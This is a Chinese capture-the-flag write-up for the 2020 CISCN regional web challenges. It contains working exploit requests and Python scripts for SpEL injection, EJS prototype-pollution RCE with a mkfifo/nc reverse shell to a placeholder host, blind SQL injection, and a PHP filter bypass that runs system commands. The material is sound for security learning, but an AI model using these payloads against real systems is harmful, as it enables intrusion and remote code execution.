2020ciscn华东北分区赛web题目wp

前言:2333

Day1

web3

直接访问flag.php就可以了。

感觉预期解应该为:

1
2
3
4
5
6
7
8
9
10
11
12
13
POST /huadongbei/cat.php?s1=data://text/plain;base64,Zmlyc3QgYmxvb2Q=&s2=0e215962017&s3=SHELL.TXT HTTP/1.1
Host: 192.168.43.44
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 13
Content-Type: application/x-www-form-urlencoded

file=flag.php

web4

spel表达式注入

1
1.class. forName("java.nio.file.File").lines(1.class. forName("java.nio.file.Paths").get("/flag.txt")).toArray()[0]

image-20200912171629921

1
2
3
4
5
6
7
8
9
10
11
12
# -*- coding: UTF-8 -*-
import requests 

url = "http://172.20.7.104:8080"
payload = "1.class.forName(\"java.nio.file.Files\").lines\x00(1.class.forName(\"java.nio.file.Paths\").get\x00(\"/flag.txt\")).toArray()[0]"
proxy = {"http":"http://127.0.0.1:8080"}
data = {"expr":payload} 
headers = {
    "Content-Type":"application/x-www-form-urlencoded"
}
re = requests.post(url, data, headers=headers, proxies=proxy)
print(re.content)

image-20200912171031671

web7

参考:

Nginx错误配置alias导致目录遍历漏洞

image-20200912203459538

nginx配置出错,可以读文件

1
2
3
4
5
6
7
8
9
10
11
12
# /etc/nginx/conf.d/default.conf
server {
    listen 80;
    server_name _;
    location /static {
        autoindex on;
        alias /app/static/;
    }
    location / {
	    proxy_pass http://127.0.0.1:3000;
	}
}

express-upload 原型链污染 –> ejs模板rce。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
POST /4_pATh_y0u_CaNN07_Gu3ss HTTP/1.1
Host: 172.20.7.107
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykhBq9JNmc6ZBCe9M
Content-Length: 261

------WebKitFormBoundarykhBq9JNmc6ZBCe9M
Content-Disposition: form-data; name="__proto__.outputFunctionName";

_tmp1;global.process.mainModule.require('child_process').exec("cat /flag.txt > aa");var __tmp
------WebKitFormBoundarykhBq9JNmc6ZBCe9M--

image-20200912135951627

image-20200912171056211

image-20200912140046413

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# -*- coding: UTF-8 -*-
import requests

url = "http://172.20.7.107/4_pATh_y0u_CaNN07_Gu3ss"

files = {
  "__proto__.outputFunctionName" : (None,"_tmp1;global.process.mainModule.require('child_process').exec(\"curl xxxx:6666\");var __tmp")
}
payload = "_tmp1;global.process.mainModule.require('child_process').exec('rm /tmp/fa;mkfifo /tmp/fa;cat /tmp/fa|/bin/sh -i 2>&1|nc xxx 6666 > /tmp/fa ');var __tmp2"
files = {
  "__proto__.outputFunctionName" : (None,payload)
}
proxies = {"http": "http://127.0.0.1:8080","https": "http://127.0.0.1:8080"}
re = requests.post(url, files = files, proxies=proxies)
print re.text

Day2

web2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
# encoding=utf-8
import requests

url="http://172.20.7.102/index.php"
proxies = {
		"http": "http://127.0.0.1:8080",
		}
flag=""

#erfenfa
for i in range(1,13):
	high = 127
	low = 32
	mid = (low + high) // 2	
	while high > low:
		payload = "||ascii(right(password,{}))/**/>/**/{}#"
		payload = payload.format((13-i),mid)
		data = {
			"username":"admin\\",
			"password":payload
		}
		print payload
		r = requests.post(url,data=data,proxies=proxies)
		#print(r.content)
		if "error" not in r.text:
			low=mid+1 
		else:
			high=mid
		mid=(low+high)//2
	flag+=chr(mid)
	print(flag)

image-20200913125614666

登陆

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
error_reporting(0);
if(!isset($_GET['gzmtu'])){
    highlight_file(__FILE__);
}else{
    $gzmtu = $_GET['gzmtu'];
    if (preg_match('/(f|l|a|g|\.|t|x|\/|;|\"|\'|\`|\||\[|\]|\_|\^|=)/i',$gzmtu)) {
        die('forbidden');
    }
    $blacklist = get_defined_functions()['internal'];
    foreach ($blacklist as $blackitem) {
        if (preg_match ('/' . $blackitem . '/im', $gzmtu)) {
            die('nonono!');
        }
    }
    eval('echo '.$gzmtu.';');
}

取反绕过

1
2
http://172.20.7.102/c2ZtdHFs.php?gzmtu=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98%D1%8B%87%8B)
system("cat /flag.txt")

image-20200913121916000

web5

PostgreSQL注入,没做出来。。。。。。

web6

修复是才知道是ssrf,

有一个ssrf.php,据说file:///flag 就可以得到flag